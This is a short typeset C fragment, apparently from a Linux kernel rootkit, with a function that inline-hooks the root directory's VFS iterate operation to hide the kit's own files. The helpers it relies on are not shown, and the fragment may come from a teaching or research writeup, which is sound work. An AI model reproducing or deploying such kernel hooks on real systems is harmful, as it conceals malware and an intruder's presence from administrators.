\begin{Verbatim}[commandchars=\\\{\}]
\PYG{c+cm}{/**}
\PYG{c+cm}{ * Hijacks the VFS in order to gain control over the filesystem. For our}
\PYG{c+cm}{ * purposes this will largely be used to hide files in plain sight. (The kit}
\PYG{c+cm}{ * itself and all of its friends).}
\PYG{c+cm}{ *}
\PYG{c+cm}{ * This function works by finding the function pointer to the iterate method of}
\PYG{c+cm}{ * the root directory and performing an inline hook to modify its prologue}
\PYG{c+cm}{ * bytes to transfer execution to our replacement filldir routine.}
\PYG{c+cm}{ */}
\PYG{k+kt}{void} \PYG{n+nf}{hijack\PYGZus{}vfs}\PYG{p}{(}\PYG{k+kt}{void}\PYG{p}{)} \PYG{p}{\PYGZob{}}

    \PYG{c+c1}{// Check we\PYGZsq{}re operating on a 3.1.1 kernel and above.}
    \PYG{c+cp}{\PYGZsh{}if LINUX\PYGZus{}VERSION\PYGZus{}CODE \PYGZgt{}= KERNEL\PYGZus{}VERSION(3, 1, 1)}

        \PYG{c+c1}{// Perform our dastardly switcheroo of the root iterate function.}
        \PYG{n}{asm\PYGZus{}hook\PYGZus{}create}\PYG{p}{(}\PYG{n}{get\PYGZus{}fop}\PYG{p}{(}\PYG{l+s}{\PYGZdq{}/\PYGZdq{}}\PYG{p}{)}\PYG{o}{\PYGZhy{}\PYGZgt{}}\PYG{n}{iterate}\PYG{p}{,} \PYG{n}{root\PYGZus{}iterate}\PYG{p}{);}

    \PYG{c+cp}{\PYGZsh{}endif}
\PYG{p}{\PYGZcb{}}
\end{Verbatim}
